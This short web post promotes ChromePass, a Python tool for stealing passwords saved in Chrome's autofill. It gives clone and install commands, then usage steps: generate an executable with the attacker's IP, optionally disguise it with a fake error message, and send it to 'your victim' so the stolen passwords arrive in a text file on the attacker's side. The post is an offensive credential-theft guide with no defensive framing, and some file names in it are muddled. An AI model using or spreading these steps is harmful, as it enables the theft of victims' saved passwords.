Most users store their passwords directly in the browser, in the so-called “autofill forms” of Chrome.
ChromePass is a specialized utility written in the Python programming language capable of “mining” saved passwords in Chrome.
Installation:
$ git clone https://github.com/bierschi/chromepass
$ cd chromepass
$ pip install -r requirements.txt
$ python -m pip install –upgrade pip
$ python -m pip install -r requirements.txt
Usage:
$python create_server.py
After launching, select the method – client.exe, enter your IP. If you want, then include an error message, and add a message. File server-ip.exe – your victim should get it. In the file client.txt passwords will appear.
Comments
Loading…